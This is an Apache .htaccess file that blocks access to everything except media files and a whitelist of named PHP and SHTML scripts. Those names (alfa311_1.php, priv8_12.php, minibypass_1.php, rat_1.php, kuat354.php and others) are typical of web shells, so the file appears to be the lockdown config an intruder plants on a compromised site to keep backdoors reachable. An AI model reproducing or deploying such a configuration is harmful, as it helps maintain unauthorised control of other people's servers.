Options -Indexes
Deny from all
<FilesMatch '(?i)\.(jpg|jpeg|png|gif|xml|doc|docs|docx|pdf|csv|xlsx|ico|webp|txt|mp4|mp3|3gp|css|js|eps|ai|JPEG|JPG|PNG|GIF|BMP|bmp|webp|WEBP|txt|eps|)$'>
    Order allow,deny
    Allow from all
</FilesMatch>
<FilesMatch '^(chmod_.php|ssi_.shtml|alfa311_1.PhP|baja_cpan.php|kuat354.php|admin_cpn.php|rat_1.php|admin_12.php|bypas_cpn.php|bypas_cpn.php|super_kuat.php|ssilengkap.ShtMl|admine.php|lock_lock21.php|minibypass_1.php|alfa311_1.php|priv8_12.php|css_13.php|db_354@.php|chat_ai.php|index.html|sitemap.xml|robots.txt|googlee077984653c9b15b.html|kuat354.PHP|kuat354.php|moli.php|php.pHp)$'>
    Order allow,deny
    Allow from all
</FilesMatch>

